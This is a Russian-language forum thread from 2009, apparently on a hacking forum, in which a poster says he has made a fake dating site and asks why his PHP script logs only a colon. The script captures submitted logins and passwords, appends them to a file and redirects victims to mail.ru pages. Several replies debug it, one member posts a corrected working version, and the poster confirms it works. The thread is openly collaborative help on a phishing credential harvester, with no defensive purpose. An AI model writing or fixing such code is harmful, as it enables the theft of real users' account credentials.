что же здесь не так то???

Discussion in 'PHP' started by Ferment, 9 Mar 2009.

  1. Ferment

    Ferment New Member

    Joined:
    3 Mar 2009
    Messages:
    8
    Likes Received:
    1
    Reputations:
    -3
    сделал очередной фэйк на знакомства, после ввода логина и пароля перекидывает человека куда нужно, к базе обращается и даже пишет в ней, но только двоеточие : , а не данные юзера
    не глянете скрипт который за это отвечает, вроде всё проверил.....где ошибка?
    <?PHP

    $Login = $_POST['Login'];//?????
    $Pass = $_POST['Password'];//??????
    $fp = fopen("654321","a+"); // Îòêðûâàåì ôàéë áàçû
    fwrite($fp,"$Login:$Passw\n"); // Çàïèñûâàåì ëîãèí:ïàðîëü
    fclose($fp); // Çàêðûâàåì ôàéë

    header(echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://cards.mail.ru/card.html


    ?>
     
  2. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    438
    Likes Received:
    164
    Reputations:
    -19
    fwrite($fp,"$Login:$Passw\n");

    я думаю надо так

    fwrite($fp,$Login.":".$Passw);

    пробуй
     
  3. Gifts

    Gifts Green member

    Joined:
    25 Apr 2008
    Messages:
    2,494
    Likes Received:
    807
    Reputations:
    614
    Ferment Опечатка в коде, в одном месте $Pass в другом $Passw И еще одно - текст формы в студию, возможно поля называются не Login Password
     
    _________________________
  4. Ferment

    Ferment New Member

    Joined:
    3 Mar 2009
    Messages:
    8
    Likes Received:
    1
    Reputations:
    -3
    сделал как написал diznt но результат не изменился. так и присылает на базу двоеточие и всё......
    <?PHP

    $Login = $_POST['Login'];//?????
    $Pass = $_POST['Password'];//??????
    $fp = fopen("654321","a+"); // Îòêðûâàåì ôàéë áàçû
    fwrite($fp,$Login.":".$Pass); // Çàïèñûâàåì ëîãèí:ïàðîëü
    fclose($fp); // Çàêðûâàåì ôàéë

    header("Location: http://cards.mail.ru/card.html?cd=00dcfed993b461be466bcca05114e17f");
    echo "<META HTTP-EQUIV=\"Refresh\" content =\"0; URL=http://win.mail.ru/cgi-bin/start?1390370218\">"//???? ?????? ???????????? ????? ???? ??? ?? ???? ??????!

    ?>
     
  5. nonamez

    nonamez Elder - Старейшина

    Joined:
    22 Jul 2007
    Messages:
    628
    Likes Received:
    283
    Reputations:
    17
    скорей всего в этом дело-не правельные переменные пытаешься ловить
     
  6. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ТС просто не понимает, что он даже не весь код выложил
     
  7. kl0yn

    kl0yn New Member

    Joined:
    15 Dec 2008
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    как уже говорили проверь в форме названия инпутов "Login", "Password".
    Возможно данные с формы передаються методом get.
    Вообщем, попробуй $_REQUEST['Login'] вместо $_POST['Login']
     
  8. 4adr0s

    4adr0s Elder - Старейшина

    Joined:
    14 Dec 2007
    Messages:
    75
    Likes Received:
    11
    Reputations:
    0
    Я может и ламос, но вопрос такой: а не стоит ли переменные запятыми отделять??
    fwrite($fp,$Login,":",$Passw);
     
    1 person likes this.
  9. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    862
    Likes Received:
    616
    Reputations:
    211
    если би хоть кто-то запустил, он би увидел ошибку
    Code:
    <?php
    
    $Login = $_POST['Login'];
    $Pass = $_POST['Password'];
    $fp = fopen("654321","a+"); 
    fwrite($fp,"$Login:$Passw\n");
    fclose($fp);
    
    header(echo "<html><head><META HTTP-EQUIV='Refresh'
        content ='0; URL=http://cards.mail.ru/card.html[size=4][b][color=red]");[/color][/b][/size]
    
    ?>
    видимо автор тупо скопировал скрипт
    p.s.: даже при запуске пишет что ошибка на 9 строчке. так зачем ти ищеш ошибку во второй ?!
     
    #9 eLWAux, 10 Mar 2009
    Last edited: 10 Mar 2009
  10. kl0yn

    kl0yn New Member

    Joined:
    15 Dec 2008
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    4adr0s,
    int fwrite ( resource $handle, string $string [, int $length] )

    $handle - хендл файла
    $string - строка которую хочешь записать
    $length - длина строки (этот параметр не объязателен)
    т.е. максимум 3 параметра

    а у тебя параметров 4
     
  11. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,002
    Likes Received:
    435
    Reputations:
    90
    двоеточия только записывает?)))) ну а ты задал login и пассоврд $ ?)))
     
  12. kl0yn

    kl0yn New Member

    Joined:
    15 Dec 2008
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    TC просто спец в кодинге :)
    https://forum.antichat.ru/thread109648.html
     
  13. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    862
    Likes Received:
    616
    Reputations:
    211
    PHP:
    <?php

    if (isset($_POST['Login']) && isset($_POST['Password'])) {
        
    $Login $_POST['Login'];
        
    $Pass $_POST['Password'];
        
    $fp fopen("654321","a+");
        
    fwrite($fp,"$Login:$Pass\n");
        
    fclose($fp);
    }

    echo 
    "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://cards.mail.ru/card.html";

    ?>
    и не говори что не работает!
    все проверил, все окей!
     
    1 person likes this.
  14. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    862
    Likes Received:
    616
    Reputations:
    211
    Модери, тему можна close
    p.s.: тс, подучи php для начала хотя-би.. =\\
     
  15. Ferment

    Ferment New Member

    Joined:
    3 Mar 2009
    Messages:
    8
    Likes Received:
    1
    Reputations:
    -3
    разобрался, спасибо